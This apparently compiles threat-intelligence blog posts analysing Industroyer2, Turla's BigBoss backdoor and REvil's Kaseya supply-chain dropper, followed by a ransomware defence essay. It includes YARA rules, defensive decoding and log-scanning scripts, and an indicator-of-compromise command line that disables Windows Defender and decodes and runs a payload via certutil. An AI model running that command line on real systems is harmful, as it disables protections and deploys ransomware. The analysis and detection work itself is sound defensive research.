Industroyer2: The ICS-capable malware re-emerges in order to cause critical services disruption

A few days ago a new variant of an ICS-capable malware known as Industroyer was employed in a cyber-attack conducted against industrial control systems (ICS) responsible for the management and control of power plant subsystems in Ukraine.

This new version has been named Industroyer2 and represents the evolution of a malware family already observed in December 2016 operating against similar targets. The attack was reported after a long series of other attacks targeting Ukrainian organizations and entities, which generally involved wipers, backdoors and DDoS attacks.

Its peculiarity is that it is the first of these attacks to have clearly targeted ICS infrastructure and to employ ICS-capable malware.


I had a look at the file identified with the following characteristics:


This is a 37.00 KB, 32-bit x86 Portable Executable (PE) compiled on Wednesday 23 March 2022 at 10:07:29, as shown in the evidence reported below.

Basically, the malware is designed to read some embedded configuration entries in order to craft IEC-104 Application Service Data Unit (ASDU) messages that allow it to interact with the targeted remote units (reachable at internal IP addresses) over TCP.

Looking at the execution flow, we can see that this piece of malware handles two optional command-line parameters, -t and -o, as shown in the code extract below.

-o writes the debug output to a file on the filesystem (by default it is printed to the console), while -t delays execution until a given time, checked against the current SystemTime.

After parsing the parameters provided via the CLI, the malware starts to retrieve the information from the embedded configuration entries.

These entries appear as in the following image.

Each configuration entry starts with an internal IP address (the last two octets are obscured in the image above) and a port, followed by four numbers (possibly some sort of operating flags), a process name and a path (in this case D:\OIK\DevCounter).

The last chunk consists of the information used to construct the messages intended to be sent to the ASDUs. For each of the entries found, the malware first terminates the process PServiceControl.exe.

The process name is hardcoded within the executable.

At this point it enumerates processes again in order to find the process name corresponding to the one specified in the configuration entry (PService_PPD.exe).

After recovering the path D:\OIK\DevCounter and the file name PService_PPD.exe, it renames the file present under this path by appending the .MZ extension to it.

Most likely this is done to prevent any task designed to keep the process 'always on' from re-launching it. For each embedded configuration entry a thread is then created in order to implement the IEC-104 communication protocol.

IEC-104 extends IEC-101 so that it can be transmitted over a TCP/IP network. In each such thread the malware will attempt to communicate with the specified IP address using the protocol described in the IEC-104 standard, after iterating through the ASDU entries in the configuration block.

In IEC-104 each object in the ASDU has an Information Object Address. The primary purpose of this action is to connect to the specified IP address and send crafted ASDU messages that result in the state of the Information Object Address being set to either ON or OFF.
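To make the ASDU structure discussed above concrete from the monitoring side, the following Python decoder is an added example (not code from the original post and not derived from the malware): it parses an IEC 60870-5-104 APDU, distinguishes I/S/U frames, and for command ASDUs extracts the common address, the Information Object Address and the ON/OFF state, which is what a network sensor would alert on. It goes slightly beyond the text by handling both the single command (type 45) and the double command (type 46); the sample frames are constructed, not captured traffic.

```python
"""Decoder for IEC 60870-5-104 command APDUs (added example, not code from the original post)."""
import struct

# ASDU type identifiers handled here (IEC 60870-5-101 / -104 numbering).
C_SC_NA_1 = 45  # single command: one bit, ON/OFF
C_DC_NA_1 = 46  # double command: OFF=1, ON=2
TYPE_NAMES = {C_SC_NA_1: "C_SC_NA_1 (single command)", C_DC_NA_1: "C_DC_NA_1 (double command)"}

# Causes of transmission seen in a command exchange (low 6 bits of the first COT octet).
COT_NAMES = {6: "activation", 7: "activation confirmation", 8: "deactivation",
             9: "deactivation confirmation", 10: "activation termination"}


def parse_apdu(frame: bytes) -> dict:
    """Decode one APDU (APCI + ASDU). Only I-format frames carry an ASDU."""
    if len(frame) < 6 or frame[0] != 0x68:
        raise ValueError("not an IEC-104 APDU: missing 0x68 start byte")
    if frame[1] != len(frame) - 2:
        raise ValueError("APCI length octet does not match the frame length")
    ctrl = frame[2:6]
    if ctrl[0] & 0x01:                       # bit 0 set: S-format (01) or U-format (11)
        return {"format": "U" if (ctrl[0] & 0x03) == 0x03 else "S"}
    info = {
        "format": "I",
        "send_seq": (ctrl[0] >> 1) | (ctrl[1] << 7),
        "recv_seq": (ctrl[2] >> 1) | (ctrl[3] << 7),
        "objects": [],
    }
    asdu = frame[6:]
    if len(asdu) < 6:
        raise ValueError("ASDU header truncated")
    type_id, vsq, cot, originator, common_addr = struct.unpack("<BBBBH", asdu[:6])
    info.update({
        "type_id": type_id,
        "type_name": TYPE_NAMES.get(type_id, "unsupported type %d" % type_id),
        "cot": cot & 0x3F,
        "cot_name": COT_NAMES.get(cot & 0x3F, "other"),
        "negative": bool(cot & 0x40),        # P/N bit: negative confirmation
        "test": bool(cot & 0x80),            # T bit: test frame
        "originator": originator,
        "common_addr": common_addr,
    })
    if type_id not in TYPE_NAMES:
        return info                          # header only for types this decoder does not model
    sequence = bool(vsq & 0x80)              # SQ=1: one IOA, following objects are contiguous
    count = vsq & 0x7F
    body, pos, ioa = asdu[6:], 0, None
    for _ in range(count):
        if ioa is None or not sequence:
            if pos + 3 > len(body):
                raise ValueError("information object address truncated")
            ioa = body[pos] | (body[pos + 1] << 8) | (body[pos + 2] << 16)   # 3-octet IOA
            pos += 3
        else:
            ioa += 1
        if pos >= len(body):
            raise ValueError("command qualifier truncated")
        qual = body[pos]
        pos += 1
        if type_id == C_SC_NA_1:
            state = "ON" if qual & 0x01 else "OFF"
        else:
            state = {1: "OFF", 2: "ON"}.get(qual & 0x03, "INVALID")
        info["objects"].append({
            "ioa": ioa,
            "state": state,
            "select": bool(qual & 0x80),     # S/E bit: 1 = select, 0 = execute
            "qualifier": (qual >> 2) & 0x1F, # QU: pulse/persistent output qualifier
        })
    return info


def describe_control_commands(frame: bytes) -> list:
    """One alert-friendly line per commanded object, empty if the frame carries no command."""
    parsed = parse_apdu(frame)
    if parsed.get("format") != "I":
        return []
    return [
        "%s CA=%d IOA=%d -> %s (%s, COT=%s)" % (
            parsed["type_name"], parsed["common_addr"], obj["ioa"], obj["state"],
            "select" if obj["select"] else "execute", parsed["cot_name"])
        for obj in parsed["objects"]
    ]


# Constructed frames (not captured traffic): I-format, sequence numbers 0, common address 1.
SAMPLE_SINGLE_ON = bytes.fromhex("68 0e 00 00 00 00  2d 01 06 00 01 00  e8 03 00 01")   # IOA 1000, execute ON
SAMPLE_DOUBLE_OFF = bytes.fromhex("68 0e 00 00 00 00  2e 01 06 00 01 00  01 00 00 01")  # IOA 1, execute OFF
SAMPLE_STARTDT = bytes.fromhex("68 04 07 00 00 00")                                     # U-format STARTDT act

if __name__ == "__main__":
    for line in describe_control_commands(SAMPLE_SINGLE_ON) + describe_control_commands(SAMPLE_DOUBLE_OFF):
        print(line)
```

A sensor built on this decoder would typically whitelist the common addresses and IOAs that the engineering workstation is allowed to command and alert on any activation (COT 6) towards other objects, or on activations originating from a host that never issued commands before.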


A comparative analysis of INDUSTROYER (its IEC-104 module) and INDUSTROYER2 shows many similarities, above all in the operating logic, despite the fact that the latest samples certainly show substantial differences when compared with the 2016 ones.

Among the technical similarities at the code level, overlaps can be observed in the functions dedicated to the management, composition and control of ASDU messages.

The new executable in some cases joins together strings that were separate in the previous sample, optimizing in some cases the overall execution, but in general the strings that refer to the debug messages are the same, allowing old YARA rules to match the new sample as well.

According to the first attribution of the family shared by ESET researchers, and in light of the further technical evidence extracted in this article, the threat in question is to be linked to the threat actor known as Sandworm (aka BlackEnergy).


I can definitely say that the Industroyer malware family is a sophisticated piece of malware used against industrial control systems (ICS). The findings reported here are in line with previous operations already attributed by the security community to Russian APT groups and, to the best of my current knowledge, this is the first ICS-capable malware used since the beginning of the conflict between Russia and Ukraine, after a long series of attacks that have seen the use of wipers, backdoors, different early- and middle-stage implants and (D)DoS attacks.

The use of this type of malware should raise awareness of the potential of Russian state-linked APT groups to focus their efforts against industrial control systems (ICS), and of their willingness to use this kind of "digital weapon" to cause the disruption of critical services.

It is important to consider that the attackers could adapt this malware to other similar targets, and that any intrusion against targets of this type should be considered extremely dangerous and complex to mitigate, given the presence of protocols designed decades ago without taking security into consideration.


rule Sandworm_Industroyer2_76222_00001 : RUSSIAN THREAT GROUP {
    meta:
        author = "Emanuele De Lucia"
        description = "Strings-based threat detection rule for INDUSTROYER2"
        tlp = "white"
        date = "2022-04-15"
        hash1 = "d69665f56ddef7ad4e71971f06432e59f1510a7194386e5f0e8926aea7b88e00"
    strings:
        $ = "PServiceControl.exe"
        $ = "Sent=x%X | Received=x%X"
        $ = "Cause: %s (x%X) | Telegram type: %s (x%X)"
        $ = "Length:%u bytes | "
        $ = "Unknown APDU format !!!"
        $ = "%02hu:%02hu:%02hu:%04hu"
    condition:
        uint16(0) == 0x5a4d and all of them
}

The BigBoss Rules: Something about one of the Uroburos’ RPC-based backdoors

BigBoss is one of the RPC-based backdoors used by Uroburos (aka Turla, Snake, Venomous Bear, Pacifier). It was first spotted in 2018 and was observed to include new features in the last quarter of 2020. During operations it is usually used in combination with RATs (Remote Administration Tools) such as Kazuar and Carbon. Several months ago I had the opportunity to analyze some versions of these pieces of malware and have now decided to publish an excerpt based solely on some specific technical characteristics observed. The activity had as its objective the production of detection and attribution rules, one of which is shared in this post.


BigBoss implants export three functions. Start() is designed to retrieve basic information and to call sub_407E50 at 0040B0D3. First of all the module name kernel32.dll is de-XORed with the key 0x4d4e and a handle to kernel32.dll is obtained through GetModuleHandle. The malware writer chose to dynamically resolve certain API functions, likely in order to hide from static analysis the information about the libraries and functions used by the implant that would normally be stored in the IAT. In this case IsWow64Process is found through GetProcAddress to retrieve the OS bitness.

Shortly after, sub_409C70 is called to retrieve the path of the .inf file.

BigBoss writes a configuration file named backport.inf. The configuration file is written to %SystemRoot%\INF\backport.inf (as reported in the screenshot above) and contains a [Version] section with various configuration entries. At this point the StartServiceCtrlDispatcher function is called in order to connect to the SCM (Service Control Manager) and start the control dispatcher thread. The dispatcher thread loops, waiting for incoming control requests for the services specified in the dispatch table.

The service name is SWCheckState. Further API functions are then dynamically resolved. One of them is CreateService, retrieved in this case too through a GetProcAddress call after obtaining a handle to advapi32.dll at sub_408790. After the service is created, OpenService is called in order to interact with the service just created, and ChangeServiceConfig2W and ChangeServiceConfigW are subsequently used to modify its parameters. Finally, StartService starts the service. In ServiceMain, RegisterServiceCtrlHandlerEx is used to register a control handler with the control dispatcher. SetServiceStatus is called to set the status of the service and the CreateEvent function is then responsible for creating the event object.

The SMB server is then enabled by creating the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters in sub_40AB90. Named pipes are used for interprocess communication (IPC) both locally and remotely, and access to remote named pipes is done via SMB. The value RestrictAnonymous under HKLM\SYSTEM\CurrentControlSet\Control\LSA is then set to 0 so that anonymous logon users can access all shared resources on a remote share.

The registry value HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanServer\Parameters\NullSessionPipes is also written in order to add the following values:
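The two registry changes just described (RestrictAnonymous forced to 0 and extra entries in NullSessionPipes) are easy to audit from the output of a plain reg query. The following Python is an added example, not code from the original post: it parses reg query output for the LSA and LanmanServer keys and reports the weakened setting and any pipe not in a baseline the administrator supplies. The reg query text and the pipe names in it are constructed placeholders (the real values BigBoss adds are not reproduced here), and the baseline of expected pipes is an assumption the caller provides.

```python
"""Audit of the null-session registry settings described above (added example, not from the original post)."""
import re

# Keys compared case-insensitively, as printed by 'reg query' (HKLM expands to HKEY_LOCAL_MACHINE).
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa".lower()
LANMAN_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters".lower()


def parse_reg_query(text):
    """Parse 'reg query <key>' output into {key (lowercased): {value name: (type, data)}}.

    Key lines are not indented; value lines are indented and separated by runs of spaces
    into name, type and data. REG_MULTI_SZ data is printed with a literal backslash-zero
    between the strings.
    """
    result, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith((" ", "\t")):
            current = raw.strip().lower()
            result.setdefault(current, {})
            continue
        if current is None:
            continue
        parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
        if len(parts) == 3:
            result[current][parts[0]] = (parts[1], parts[2])
        elif len(parts) == 2:            # value with empty data
            result[current][parts[0]] = (parts[1], "")
    return result


def audit_null_session_settings(reg_text, pipe_baseline=frozenset()):
    """Return findings for the values BigBoss is described as changing.

    pipe_baseline: pipe names the administrator considers expected for this host
    (an assumption supplied by the caller); anything else in NullSessionPipes is reported.
    """
    reg = parse_reg_query(reg_text)
    findings = []
    restrict = reg.get(LSA_KEY, {}).get("RestrictAnonymous")
    if restrict is not None and int(restrict[1], 16) == 0:
        findings.append("RestrictAnonymous=0: anonymous (null session) access to shares is not restricted")
    pipes = reg.get(LANMAN_KEY, {}).get("NullSessionPipes")
    if pipes is not None:
        for name in (p for p in pipes[1].split("\\0") if p):
            if name not in pipe_baseline:
                findings.append("NullSessionPipes lists unexpected pipe '%s'" % name)
    return findings


# Constructed sample output (not from a real host); the pipe names are placeholders.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    RestrictAnonymous    REG_DWORD    0x0
    RestrictAnonymousSAM    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    NullSessionPipes    REG_MULTI_SZ    expected_pipe_a\0expected_pipe_b\0implant_pipe_placeholder
    AutoShareServer    REG_DWORD    0x1
"""

if __name__ == "__main__":
    for finding in audit_null_session_settings(SAMPLE_REG_QUERY, {"expected_pipe_a", "expected_pipe_b"}):
        print(finding)
```

Running the audit periodically (or feeding the same logic with Sysmon registry-set events for these two values) turns the implant's own preparation step into a detection opportunity, since neither value is commonly changed by legitimate administration on a workstation.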







sub_40AAE0 is responsible for connections to remote devices over the IPC$ share via WNetAddConnection2.

BigBoss supports connections through null sessions or via default credentials. A thread is then created with sub_408830 as its StartAddress. This thread is mainly responsible for handling communications with the CnC (Command and Control) server. CreateNamedPipeW and ConnectNamedPipe are used to test the connection. If successful, it is able to get additional payloads and write the results of its operations into log files created and written under the %temp% path.


BigBoss is an integral part of the Turla team's attack and persistence suite. Its development and evolution have probably shared practices and logic with other implants linked to its main cluster, such as the second-stage backdoor called Carbon. For example, by analyzing both, it can be noted that BigBoss shares with Carbon not only a partial overlap in some internal functions, as shown below,

but in some cases whole code chunks with a full overlap.

I based one of my hunting rules for this family on this piece of code. The rule is released in the "Detection" section.




rule Turla_Code_00325_00291 {
    meta:
        author = "Emanuele De Lucia"
        description = "Yara hunting rule for Turla shared code chunk"
        hash1 = "3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122"
        hash2 = "a679dbde0f4411396af54ea6ac887bd0488b2339cd8a4b509a01ca5e906f70bd"
        hash3 = "c819ec7743e2f5db13f277749961dffad08dba6dd21450eea33a27403386c959"
        hash4 = "7bb65fe9421af04c5546b04a93aa0e517356c0a85856f1265587983ce2bf8aef"
        hash5 = "94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd"
    strings:
        $hex = { 8B (4C 24 ??|55 ??) (51|52) 8D (54 24 ??|45 ??) (52|50) 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D (44 24 ??|4D ??) (50|51) 6A ?? 8D (4C 24 ??|55 ??) (51|52) 6A ?? 8D (54 24 ??|45 ??) (52|50) 8B (54 24 ??|45 ??) 6A ?? 8D (44 24 ?? | 4D ??) (50|51) 6A ?? 8D (4C 24 ??|55 ??) (51|52) 56 (52|50) FF 15 ?? ?? ?? ?? 85 C0 (0F 85 ?? ?? ?? ??|75 ??) }
    condition:
        $hex
}


Revil / Sodinokibi ransomware delivered through Kaseya VSA supply-chain attack

On July 2, 2021, Kaseya issued a notice stating that the company was experiencing a potential cyber attack against the VSA suite. The company advised that on-prem customers' servers should be shut down immediately until further notice.

VSA is a very common solution, usually used by Managed Service Providers, especially in the United States and the United Kingdom. It allows MSPs to perform patch management and client monitoring for their customers.

From the first reconstructions of the incident, a threat actor caused the spread of malicious code together with alleged updates, performing a so-called supply-chain attack. The delivered malicious code is capable of copying a malware dropper (digitally signed with a valid signature from PB03 TRANSPORT LTD.) of the Revil / Sodinokibi ransomware onto the affected systems.

As per the evidence extracted, this dropper (sha1: 5162f14d75e96edb914d1756349d6e11583db0b0) has the purpose of creating two distinct files under the path C:\Windows\. Although not common practice among malware writers, this path is hard-coded within the executable.

The creation of the aforementioned files has the purpose of side-loading a malicious DLL (sha1: 656c4d285ea518d90c1b669b79af475db31e30b1) into a legitimate copy of the Microsoft Windows Defender executable (MsMpEng.exe). As soon as the latter is launched, the file encryption phase is carried out through a legitimate process, complicating detection.

Both payloads are retrieved by referencing two resources within the dropper, as shown in the following image.

Side-Loaded DLL

The DLL loaded into the legitimate Windows Defender executable is intended to perform the actual file encryption operations. The malicious Revil / Sodinokibi payload is retrieved after a key used for this process is de-XORed at sub_10001110. The DLL exports several functions, ServiceCrtMain, ServiceMain and SvchostPushServiceGlobals, as shown in the evidence reported below.

ServiceCrtMain is the one of interest here, as it is responsible for initiating the logic that retrieves and executes the malicious instructions.

The payload is then mapped into memory as a file mapping, through CreateFileMappingW and MapViewOfFile.

File mapping is commonly used to load a file into memory and allows malware writers to manipulate it easily. CreateFileMapping creates the mapping object for a file, while MapViewOfFile returns a pointer to the base address of the mapped view. The payload is then executed. The implant configuration file, as extracted in its original form, is reported below:


Propagation and Related Risks

Supply-chain attacks perpetrated with the aim of reaching new victims are something we are not used to seeing in a ransomware-related incident. This one, however, appears to have a big impact and certainly prompts reflection on a devastating new trend in cybercrime: studying and focusing on a single target in order to hit hundreds or thousands of them. What must definitely be considered in this event is that the first targets are MSPs (Managed Service Providers), because by hitting them the attacker has the potential to further spread malicious payloads to their customers.


Affected Managed Service Providers are located at least in the following countries: US, DE, UK, IE, according to the visibility I have at the time of writing. MSPs are generally to be considered a strategic target, as they offer a direct channel to reach many other potential targets (the MSPs' own customers).

Indicators of Compromise / Linked Artifacts

updatename: Kaseya VSA Agent Hot-fix

filePath: c:\kworking\agent.exe

filePath: c:\kworking\agent.crt

Task commandline: "C:\WINDOWS\system32\cmd.exe" /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

md5: 561cffbaba71a6e8cc1cdceda990ead4

sha1: 5162f14d75e96edb914d1756349d6e11583db0b0

sha256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

md5: a47cf00aedf769d60d58bfe00c0b5421

sha1: 656c4d285ea518d90c1b669b79af475db31e30b1

sha256: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd



The following rule can be useful to identify the Revil / Sodinokibi dropper:

rule REvil_Dropper_827322_000001 {
    meta:
        description = "Detects REvil/Sodinokibi dropper as observed in Kaseya supply-chain attack"
        author = "Emanuele De Lucia"
        reference1 = ""
        reference2 = ""
        date = "2021-07-02"
        hash1 = "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e"
    strings:
        $ = "MpSvc.dll" fullword ascii
        $ = "MsMpEng.exe" fullword wide
        $ = "Antimalware Service Executable" fullword wide
        $ = "MsMpEng.pdb" fullword ascii
        $ = "SOFTIS" fullword wide
        $ = "MODLIS" fullword wide
    condition:
        uint16(0) == 0x5a4d and all of them
}


A possible way to get a first degree of visibility into potential events related to this threat is to detect how the adversary tries to disable the defenses of the victim system (T1562). In particular, the following query surfaces events in which the adversary disabled Windows Defender through PowerShell, based on the logged PowerShell messages:

# Single-quoted patterns with \$ keep "$true" literal: inside double quotes PowerShell would expand $true to True, and an unescaped $ would act as a regex end-of-string anchor, so the pattern would never match the logged command line
Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | Where-Object {($_.Message -match 'Set-MpPreference' -and $_.Message -match '-DisableRealtimeMonitoring \$true' -and $_.Message -match '-DisableIntrusionPreventionSystem \$true' -and $_.Message -match '-DisableIOAVProtection \$true' -and $_.Message -match '-DisableScriptScanning \$true' -and $_.Message -match '-EnableControlledFolderAccess Disabled' -and $_.Message -match '-EnableNetworkProtection AuditMode' -and $_.Message -match '-Force -MAPSReporting Disabled' -and $_.Message -match '-SubmitSamplesConsent NeverSend') } | Select-Object TimeCreated,Id,RecordId,ProcessId,MachineName,Message
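The query above requires every switch from the observed task command line to be present, so a variant that drops or reorders one of them slips through. As an added example (not code from the original post), the following Python applies the same Set-MpPreference indicators to exported PowerShell/Operational event messages but scores each event by how many tampering switches it contains, so partial variants still surface and can be ranked. The event records are constructed in the shape of Get-WinEvent output (RecordId, Message); the first one reproduces the switches from the task command line reported in this post.

```python
"""Scoring Set-MpPreference tampering in PowerShell log messages (added example, not from the original post)."""
import re

# One regex per tampering switch observed in the Kaseya task command line; matched
# case-insensitively and tolerant of extra whitespace between switch and value.
TAMPER_PATTERNS = {
    "DisableRealtimeMonitoring": r"-DisableRealtimeMonitoring\s+\$true",
    "DisableIntrusionPreventionSystem": r"-DisableIntrusionPreventionSystem\s+\$true",
    "DisableIOAVProtection": r"-DisableIOAVProtection\s+\$true",
    "DisableScriptScanning": r"-DisableScriptScanning\s+\$true",
    "EnableControlledFolderAccess": r"-EnableControlledFolderAccess\s+Disabled",
    "EnableNetworkProtection": r"-EnableNetworkProtection\s+AuditMode",
    "MAPSReporting": r"-MAPSReporting\s+Disabled",
    "SubmitSamplesConsent": r"-SubmitSamplesConsent\s+NeverSend",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in TAMPER_PATTERNS.items()}
SET_MPPREF = re.compile(r"\bSet-MpPreference\b", re.IGNORECASE)


def tampering_hits(message):
    """Names of the tampering switches present in a Set-MpPreference invocation (empty if none)."""
    if not SET_MPPREF.search(message):
        return []
    return [name for name, rx in COMPILED.items() if rx.search(message)]


def scan_events(events, min_hits=1):
    """Return (RecordId, hits) for events reaching min_hits tampering switches, most hits first.

    events: iterable of dicts shaped like Get-WinEvent output, with at least RecordId and Message.
    """
    alerts = []
    for event in events:
        hits = tampering_hits(event.get("Message", ""))
        if len(hits) >= min_hits:
            alerts.append((event["RecordId"], hits))
    return sorted(alerts, key=lambda alert: len(alert[1]), reverse=True)


# Constructed sample events (not real log exports). Record 1 carries the switches from the
# task command line reported above; 2 and 4 are benign administration; 3 is a partial variant.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Message": "Creating Scriptblock text (1 of 1):\nSet-MpPreference "
     "-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true "
     "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode "
     "-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend"},
    {"RecordId": 2, "Message": "Creating Scriptblock text (1 of 1):\nSet-MpPreference -ExclusionPath 'C:\\Build'"},
    {"RecordId": 3, "Message": "Creating Scriptblock text (1 of 1):\nset-mppreference -disablerealtimemonitoring $TRUE"},
    {"RecordId": 4, "Message": "Creating Scriptblock text (1 of 1):\nGet-MpPreference"},
]

if __name__ == "__main__":
    for record_id, hits in scan_events(SAMPLE_EVENTS):
        print(record_id, len(hits), ", ".join(hits))
```

A threshold of one is useful for hunting (any single disable switch outside a change window is worth a look); a higher threshold such as four reproduces the spirit of the original query while still catching reordered or trimmed variants.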



Ransomware: Survival vs Kill Chain.

What we today call "ransomware" was, at the beginning, basically screen lockers demanding a ransom from the victim ("Your PC contains illegal content and cannot be used ...").

Given the increasing revenues they are able to generate, in recent years they have become one of the fastest growing classes of malicious software in the cyber threat landscape.

Lately, moreover, almost all of the talks and articles on "cyber" topics have been related to this category of malware, as a result of a specific attack against Colonial Pipeline Inc. which caused countless economic losses and inconveniences of all kinds in the States.

In the face of the rivers of ink spilled first on the incident itself and then on the group responsible for the attack (note: it was one of the group's affiliates and not the dev team of the #DarkSide ransomware itself), there is no shortage, here and there, of articles, advice and posts by experts on how to defend against this type of malware.

The plethora of suggestions given, however, in my opinion have rarely been placed within a strategic context, and almost always take the form of a list of specific actions to be performed.

The individual items of these lists, although impeccable on their own from a theoretical point of view (such as "install a good antivirus" and "apply risk management processes"), can be difficult to apply in practice if not placed in a well-defined context that pursues a specific purpose; this purpose should be the countering and mitigation of extortion-oriented attacks and, much more generally, the enhancement of one's defensive capabilities.

Finally, considering the famous phrase "it is not possible to be 100% protected from malicious code", it is also clear that a valid defensive solution cannot be based exclusively on the adoption of the latest AV / EDR technologies (more or less sophisticated), nor much less on last-minute tricks and tips.

Survival Skills:

Implementing a good defense program against these threats is undoubtedly an active and continuous process over time that involves the strengthening of at least five (5) internal capabilities.

They are:

Prevention: preventing the exploitation of infrastructure weaknesses and / or vulnerabilities through processes for updating, hardening and controlling public information (social networks, public profiles of managers / employees, job descriptions ...). Technically speaking, in some cases prevention could also mean adopting alternative technologies to those already in place and normally used, for example, for remote access services (VPN / RDP), in order to eliminate the growing risks due to the greater attention of criminal groups towards them (0-day research, 1-day exploits and the theft / sale of access credentials on the clearnet / darknet). Their compromise could in fact be catastrophic for the environment to be protected and provide an advantage that is difficult to recover from on a defensive level, as these services are often designed to interface directly with corporate intranets.

Detection and Protection: the ability to protect your assets from potentially adverse events by acquiring the ability to detect and contain a threat. As for malicious code, the protection of your assets certainly includes the adoption of AV / EDR, execution prevention systems, sandboxes, etc.

Resistance: the ability to face and / or minimize the effects of an unknown or particularly stealthy threat that has a high possibility of representing a concrete risk. It involves the implementation of concepts such as the separation of environments, the reduction of the potential attack surface, the identification of critical services and stricter access control to them, etc.

Resilience: the ability to recover after an incident.

Knowledge (SA, Situational Awareness): clearly understanding what one must defend against in relation to our perimeter, as well as the tactics and procedures implemented by the adversaries, and the consequent adoption of a defense strategy.

Ransomware…pays off:

The Covid-19 pandemic has been very useful for the "ransomware" business. In general, the higher revenues of many criminal groups (tripled, according to some estimates, compared to the pre-Covid period) are due to the inability of many organizations to adapt to a decentralized work model after a large percentage of their workforce began to operate outside a defined perimeter (the classic corporate one).

However, in many cases it should be noted that the extension of the attack surface as a direct consequence of the new "smart workers" did not actually create a "new" problem from scratch, but often magnified one that was present even before. This problem is mainly due to the lack of equipment (not only technological, but also in terms of procedures and internal policies) with which many companies fight these threats.

The most typical and widespread weakness observed during the analysis of some incidents was to focus (or limit) these defenses on a few points compared to the five (5) listed above. Closely related to what the "classic" cyber-security industry proposes, very often the one and only line of defense is delegated to AntiVirus / EDR and "Monitoring Operations", thus concentrating the whole counter-strategy in the already described capability of "Detection and Protection".

Considering that even the most modern anti-malware solutions available on the market cannot guarantee detection rates even close to 100% (without considering the context in which an adversary comes to operate within our perimeter), it is evident that relying exclusively on them may not be enough.

Survival vs Kill Chain:

All the intrusions that end in a ransom request have effectively closed the so-called "kill chain". The kill chain represents a series of concatenated steps (or links); simplifying, in general they are:

1. Information gathering

2. First access and early-stage payload delivery

3. Lateral movement

4. Late-stage payload delivery

Closing this chain often means, for the victim, having to pay an expensive ransom to get its data and documents back. An effective counter-strategy will therefore provide for the direct mitigation of the potential risks deriving from each single phase (or link) of this kill chain, directing one's work, with a more strategic vision, towards the five (5) points identified before.

Information Gathering: in this phase, attackers seek and hunt potential victims by acquiring information about them. While only some time ago the choice of target seemed to be quite casual and a direct consequence of the general external posture of the organization to hit (in the sense that robbing a shop is generally easier than robbing a bank), now the trend seems to be moving towards a much more targeted decision, so as to be able to ask for very substantial ransoms once the operation succeeds. Under the heading of "Prevention" fall the activities aimed at not exposing one's flank to such attacks, by trying to contain the information released (voluntarily or not) on social networks and in the company's public profiles. In this regard, Security Awareness programs are particularly useful. Information sources (threat intelligence) designed to increase the Situational Awareness of the staff in charge of network protection can also be particularly useful.

First Access / Early-Stage payload delivery: in this phase, the attacker is able to obtain a first access to the perimeter. In order to make their life as difficult as possible it is necessary to correctly apply hardening and patching programs to the systems. Technically limiting the potential attack surface, applying multiple authentication factors, blocking the execution of macros and scripting languages that are not strictly necessary, checking permissions and logically limiting the communications of internal workstations are all useful elements of an Incident Prevention strategy. If the attacker still manages to deliver a first-stage payload and therefore to obtain a first access to our infrastructure, the adoption of policies aimed at obtaining greater visibility into what is happening (for example: alerts on login credential anomalies, alerts on changes to accounts in AD (Active Directory), alerts on malicious DNS resolutions, alerts on network flow anomalies (firewall logs), alerts on IDS / IPS events and so on) is useful to strengthen our Detection and Protection capabilities. EDR / AV and SIEM support these capabilities as well.

Lateral movement: in this phase, the attacker has managed to effectively compromise one or more machines inside our infrastructure and aims at expanding his/her control. If the defenses put in place up to now have proved ineffective, a further protective barrier capable of mitigating what is in progress could be the application of strong network segmentation policies between environments. A further critical factor that can significantly increase our Resistance capability is the application of Behavior Analytics Systems.

Late-stage payload delivery: if the strategies applied so far have proved ineffective in combating such an advanced and persistent adversary, we could suffer the effects of the last phase of a ransomware kill chain, that is the release of the last-stage payload, the one that will probably be in charge of encrypting our data and information. Most likely the attacker already has full control of several internal machines and has probably also obtained admin-grade credentials. Based on my personal experience, therefore, if we are at this point there is little chance that the Detection and Protection systems can effectively mitigate the course of events. The best defense at this point is to have a good backup of all data, files, applications and any other critical resources. These backups must obviously be isolated from other systems.


The ransomware business is particularly profitable. Considering the revenues it generates, it is reasonable to expect much more frequent and sophisticated attacks. The application of defensive measures at the various stages of the kill chain, however, can reduce the risk of a full data loss (and of having to rely exclusively on negotiations with criminals to recover it).


Affiliates vs Hunters: Fighting the “DarkSide”

This content was originally written by me for SOC Prime, Inc. You can view the original article with detection rules here or read on for a local version.


